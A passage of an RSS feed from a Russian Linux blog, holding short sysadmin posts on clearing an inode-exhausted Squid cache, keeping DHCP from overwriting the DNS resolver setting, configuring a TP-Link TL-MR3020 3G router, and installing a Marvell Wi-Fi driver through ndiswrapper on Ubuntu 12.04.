&lt;pre&gt;df -i&lt;br /&gt;/dev/sda2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1835008 1835008&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&amp;nbsp; 100% /var&lt;/pre&gt;
&lt;p&gt;ну а далее все просто - нужно сделать промывание&lt;/p&gt;
&lt;pre&gt;rm -fR /var/spool/squid/*&lt;br /&gt;squid -z&lt;br /&gt;chown -R proxy:proxy /var/spool/squid/&lt;br /&gt;service squid start&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1594.html</link>
      <guid>http://breys.ru/blog/1594.html</guid>
      <title>Защита resolve.conf от перезаписи при подключении по dhcp</title>
      <pubDate>Mon, 16 Dec 2013 22:28:42 +0400</pubDate>
      <description>&lt;p&gt;Может статься, что у вас настроен собственный кеширующий DNS сервер и модемное подключение по GPRS или WiFi, а настройки интерфейса выдаёт провайдер под DHCP, в этом случае файл /etc/resolve.conf будет перезаписываться при каждом подлючении, забывая про ваш полезный DNS сервер с его большим кешем адресов и собственным зонами&lt;/p&gt;
&lt;p&gt;Наверно самым элегантным решением будет&amp;nbsp;поднастроить dhcp клиента, а для этого необходимо в файле&amp;nbsp;/etc/dhcp3/dhclient.conf указать свои настройки&lt;/p&gt;
&lt;pre&gt;supersede &lt;strong&gt;domain-name&lt;/strong&gt; "xxx";&lt;br /&gt;

prepend &lt;strong&gt;domain-name-servers&lt;/strong&gt; 127.0.0.1;&lt;/pre&gt;
&lt;p&gt;Вот и всё, теперь после каждого запуска DHCP клиент будет применять все параметры, провайдера кроме переопределённых в его настройках&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <author>basmanova@jabber.ru ( katya ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1591.html</link>
      <guid>http://breys.ru/blog/1591.html</guid>
      <title>Wi-Fi-роутер TP-Link TL-MR3020</title>
      <pubDate>Tue, 03 Dec 2013 10:18:45 +0400</pubDate>
      <description>&lt;p&gt;Купил 3G WiFi роутер для раздачи интернета в лесу, его можно подключить к USB выходу компа или к розетке через адаптер. Через ethernet порт устройство выдаёт по dhcp адрес и находится по адресу http://192.168.0.254 логин и пароль по умолчанию admin&lt;/p&gt;
&lt;p&gt;Целесообразно сразу установить новую прошивку, скачав её от &lt;a title="прошивки для роутера" href="http://www.tp-link.com/kz/support/download/?model=TL-MR3020&amp;amp;version=V1"&gt;сюда&lt;/a&gt;, распоковав и закачав в роутер через вебинтерфейс управления&lt;/p&gt;
&lt;p&gt;Затем, нужно настроить параметры точки доступа SSID и пароль для WPA2 идентификации. Отлично работает с модемом Huawei E173&lt;/p&gt;
&lt;p&gt;&lt;a title="открыть: Wi-Fi-роутер TP-Link TL-MR3020" rel="lightbox[roadtrip]" href="/upload/1386058785.85.jpg"&gt;&lt;img src="/upload/images/1386058785.85.jpg" alt="Wi-Fi-роутер TP-Link TL-MR3020" /&gt;&lt;/a&gt;&lt;a title="открыть: интерфейс управления  3G/4G беспроводной маршрутизатор серии N Модель № TL-MR3020 " rel="lightbox[roadtrip]" href="/upload/1386051639.51.png"&gt;&lt;img src="/upload/images/1386051639.51.png" alt="интерфейс управления  3G/4G беспроводной маршрутизатор серии N Модель № TL-MR3020 " /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;После включения требуется примерно минута на подключение мегафон модема и устройство работает как часы&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
    <item>
      <link>http://breys.ru/blog/1590.html</link>
      <guid>http://breys.ru/blog/1590.html</guid>
      <title>Ubuntu 12.04 установка WiFi card Marvel 8335</title>
      <pubDate>Sat, 09 Nov 2013 16:55:21 +0400</pubDate>
      <description>&lt;p&gt;Если у вас 64 битное ядро и ваша lspci |grep Wireless выдаёт&lt;/p&gt;
&lt;pre&gt;03:02.0 Ethernet controller: Marvell Technology Group Ltd. &lt;strong&gt;88w8335&lt;/strong&gt; [Libertas] 802.11b/g Wireless (rev 03)&lt;/pre&gt;
&lt;p&gt;значит у вас проблемы -- производитель вашей карточки не поддержал вас драйверами к ней и ваш список сетевых интерфейсов не содержит заветной wlan0&lt;/p&gt;
&lt;p&gt;&lt;a title="открыть: Установка WiFi карточки Marvel 8335 в ubuntu 12.04" rel="lightbox[roadtrip]" href="/upload/1384002037.06.png"&gt;&lt;img src="/upload/images/1384002037.06.png" alt="Установка WiFi карточки Marvel 8335 в ubuntu 12.04" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Но это поправимо потому что в Linux есть возможность установки драйверов от ос Windows -- Ndiswrapper, устанавливаем &lt;strong&gt;ndiswrapper&lt;/strong&gt; и графическую утилиту &lt;strong&gt;ndisgtk&lt;/strong&gt; к ней&lt;/p&gt;
&lt;pre&gt;aptitude install ndiswrapper ndisgtk&lt;/pre&gt;
&lt;p&gt;Скачиваем &lt;a href="/upload/1384001781.21.gz"&gt;драйвера к 88w8335 от Windows XP x64 &lt;img style="width: 20px; height: 20px;" src="/images/zip.png" alt="Архив:драйвер к Marvel 88w8335 от Windows XP x64 для Ndisrapper" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Распечатываем архив, указываем на полученный файл mrv8335x64.inf либо с помощью &lt;strong&gt;ndisgtk&lt;/strong&gt; либо с помощью&lt;/p&gt;
&lt;pre&gt;ndiswrapper -i mrv8335x64.inf&lt;/pre&gt;
&lt;p&gt;Вроде бы всё&lt;/p&gt;</description>
      <author>ffsdmad@jabber.ru ( Басманов ) </author>
    </item>
  </channel>
</rss>

